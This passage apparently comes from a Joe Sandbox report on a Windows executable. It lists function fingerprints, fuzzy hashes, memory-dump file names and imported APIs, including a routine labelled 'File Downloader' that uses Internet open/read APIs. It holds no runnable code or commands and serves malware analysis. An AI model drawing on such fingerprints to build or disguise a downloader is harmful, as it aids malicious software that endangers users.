                                                                                                                • Opcode ID: 1ce11e46964dbc8623c1a002445926d9961ff166b97eb729fb1ae1d7354b803f
                                                                                                                • Instruction ID: 6d9112e5b050aed0ae87d3ddd276b7d620dad81d8c7612d0b7737e068c50eaa2
                                                                                                                • Opcode Fuzzy Hash: 1ce11e46964dbc8623c1a002445926d9961ff166b97eb729fb1ae1d7354b803f
                                                                                                                • Instruction Fuzzy Hash: BF22D362F1878685FB009B69D4443AD6771EB817E4F505B31EA7D86ADAEF7CE480CB00
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID: 0$0$0
                                                                                                                • API String ID: 3215553584-3137946472
                                                                                                                • Opcode ID: 4b936a4394e80428ad7bf41d875096a3e7add69c0315c25dc0869b4c3066c4ac
                                                                                                                • Instruction ID: 9cca717001fd025358f5e54789b168f7cb8671812a12011459f1a28786b67d99
                                                                                                                • Opcode Fuzzy Hash: 4b936a4394e80428ad7bf41d875096a3e7add69c0315c25dc0869b4c3066c4ac
                                                                                                                • Instruction Fuzzy Hash: 06E1D632B0D68686F7518B2481903BDB7B59B51BC6F948236C6ACC73D1EF3EA659C700
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$CloseFileHandleOpenRead
                                                                                                                • String ID: File Downloader
                                                                                                                • API String ID: 4038090926-3631955488
                                                                                                                • Opcode ID: 2d8777ee4260c80b314c9bed156458a8780df2b315401914807f3b6119ccca09
                                                                                                                • Instruction ID: 06aaaa548da030e1105f8cd366c51c0919bec9896457d24fdd7a9ecd97164c6a
                                                                                                                • Opcode Fuzzy Hash: 2d8777ee4260c80b314c9bed156458a8780df2b315401914807f3b6119ccca09
                                                                                                                • Instruction Fuzzy Hash: D531A432A1978682E7208F11E9507AAB361FF89BC4F544135EE5D83B94EF7CE545CB00
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$CompareInfoString
                                                                                                                • String ID:
                                                                                                                • API String ID: 2984826149-0
                                                                                                                • Opcode ID: 26eb7e015d5d110b74ff0d84bcaa31491d724dbf353ec7a17117fafe3eaea0ab
                                                                                                                • Instruction ID: e1884fb0857c2b76ed1cee030f0fc05fc5cd40135e4810c9448f32a7f0e3122c
                                                                                                                • Opcode Fuzzy Hash: 26eb7e015d5d110b74ff0d84bcaa31491d724dbf353ec7a17117fafe3eaea0ab
                                                                                                                • Instruction Fuzzy Hash: 75A1AD62A097C286EB218B2494103BD67A1BF40BE8F585635DA7E877C9FF3DE9448700
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 3668304517-0
                                                                                                                • Opcode ID: e4343b659cd0b9c09afbc64654c36fa5ae60780d5758c29d2040cc4bdf707b3c
                                                                                                                • Instruction ID: 04f089a22e69a72bee3ca3ffc2919073480c5fdb8315f905af59a415e45a818a
                                                                                                                • Opcode Fuzzy Hash: e4343b659cd0b9c09afbc64654c36fa5ae60780d5758c29d2040cc4bdf707b3c
                                                                                                                • Instruction Fuzzy Hash: 44D1B062F18A8286EB109B65D4402AD6771EB857F8F101332EE7D97AD9EF3CE580C340
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _set_statfp
                                                                                                                • String ID:
                                                                                                                • API String ID: 1156100317-0
                                                                                                                • Opcode ID: dafef7e4c20223e5ca6141b6b5924ce650fb2efe4a4f2b5535d10e0333dca376
                                                                                                                • Instruction ID: 3b0274ea610de5a201f720b239083f6739e401a1c4f7aea49d380af21ee95c06
                                                                                                                • Opcode Fuzzy Hash: dafef7e4c20223e5ca6141b6b5924ce650fb2efe4a4f2b5535d10e0333dca376
                                                                                                                • Instruction Fuzzy Hash: 21810552D18A8685F7228B75A45137AA3B8FF953D4F044331EDBEE65D4FF3CA6818600
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnvironmentInitStringStringsUnicode$Free_invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 1868271193-0
                                                                                                                • Opcode ID: 8b2d933cefea34d056b23e68afa2b8ca65fd27bc275f09a0afe4e350c556ea32
                                                                                                                • Instruction ID: 22b6aed4d3ce4aa8d2b2cb5f4e83a9396ea4f9d27dfa481e346f9d4c2b4db6df
                                                                                                                • Opcode Fuzzy Hash: 8b2d933cefea34d056b23e68afa2b8ca65fd27bc275f09a0afe4e350c556ea32
                                                                                                                • Instruction Fuzzy Hash: FA519B22E08B8182EB148F19E54036D7772FB94BD4F549221EBAD43B95EFBCE1E08700
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                                                                                • String ID: Nk
                                                                                                                • API String ID: 3936042273-1353404103
                                                                                                                • Opcode ID: be3418052fe44ea1974ca5fcebb8a9c1463131ba3d2a8af801c3bff0b95fda79
                                                                                                                • Instruction ID: 049612d3aace9191b9f5f0d151f8f601fe9705b3cd5121472ddb70bfede1f617
                                                                                                                • Opcode Fuzzy Hash: be3418052fe44ea1974ca5fcebb8a9c1463131ba3d2a8af801c3bff0b95fda79
                                                                                                                • Instruction Fuzzy Hash: 8DC17832A14B818AE710CF75E8502AD73B1FB99798F045625EF9D53B99EF38E1A0C340
                                                                                                                APIs
                                                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6F1DD0647
                                                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6F1DD064D
                                                                                                                  • Part of subcall function 00007FF6F1E00E88: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,-2723E8D8DEBC5094,00007FF6F1E0C3D2), ref: 00007FF6F1E00ED8
                                                                                                                  • Part of subcall function 00007FF6F1E00E88: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,-2723E8D8DEBC5094,00007FF6F1E0C3D2), ref: 00007FF6F1E00F19
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$ExceptionFileHeaderRaise
                                                                                                                • String ID: exists$ios_base::badbit set
                                                                                                                • API String ID: 240014264-2074760687
                                                                                                                • Opcode ID: a4f327a84339e12cc55e92ce62d72d2997565a8db53c75ec50c66e7b8b607d78
                                                                                                                • Instruction ID: 7d6fbb080a7a91096b5aa3b2acdd178c6f2c2a7927c20c817a70878670bf1da9
                                                                                                                • Opcode Fuzzy Hash: a4f327a84339e12cc55e92ce62d72d2997565a8db53c75ec50c66e7b8b607d78
                                                                                                                • Instruction Fuzzy Hash: 82413072A19BC695DB20DB14E4943EE7361FB85384F804232D6AD93AE9EF3CD505CB40
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: GetTempPath2W$kernel32.dll
                                                                                                                • API String ID: 1646373207-1846531799
                                                                                                                • Opcode ID: 85c4015c5df5ee79752990f65a767554006cfd6127e60443cb10f02faa6b2ab0
                                                                                                                • Instruction ID: 6b0b7a568eb285d39cce75f645725f794aa39d0ad07809c81e1a3cc0d2c5bb07
                                                                                                                • Opcode Fuzzy Hash: 85c4015c5df5ee79752990f65a767554006cfd6127e60443cb10f02faa6b2ab0
                                                                                                                • Instruction Fuzzy Hash: 08E0ED21F08A8781EF049F11FA984B96361BF49BD0B985035D92F873A4FF3CD4998B00
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                • String ID: iterator does not fit current value$iterator out of range
                                                                                                                • API String ID: 3668304517-1046077056
                                                                                                                • Opcode ID: b0819f3c7b3530c9745c47e6feffb757659fe9534c430cce830ae92edabcbbeb
                                                                                                                • Instruction ID: 923f0c0f8f5cc53a26f0d4598ec6c70507ee5d216a182cde641933745f0a056b
                                                                                                                • Opcode Fuzzy Hash: b0819f3c7b3530c9745c47e6feffb757659fe9534c430cce830ae92edabcbbeb
                                                                                                                • Instruction Fuzzy Hash: DE41A2A3F09A8196EB11DB60D4A43EC2731AB517C8F945176CB2D83ADBEF38D55AC340
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                • String ID: iterator does not fit current value$iterator out of range
                                                                                                                • API String ID: 3668304517-1046077056
                                                                                                                • Opcode ID: 73766c951f2fe278ced241f82245c4320f39279882436e5d0bcf5ff273759009
                                                                                                                • Instruction ID: 33e1818543a23ab6c00c81aeb1bef39eb91c1ba282e680de4025c45d85dc58a4
                                                                                                                • Opcode Fuzzy Hash: 73766c951f2fe278ced241f82245c4320f39279882436e5d0bcf5ff273759009
                                                                                                                • Instruction Fuzzy Hash: 5241C6A3B0968196EB11DB60D8A42EC2330AB517C8FD05536CB2D93ADAEF38D55AC340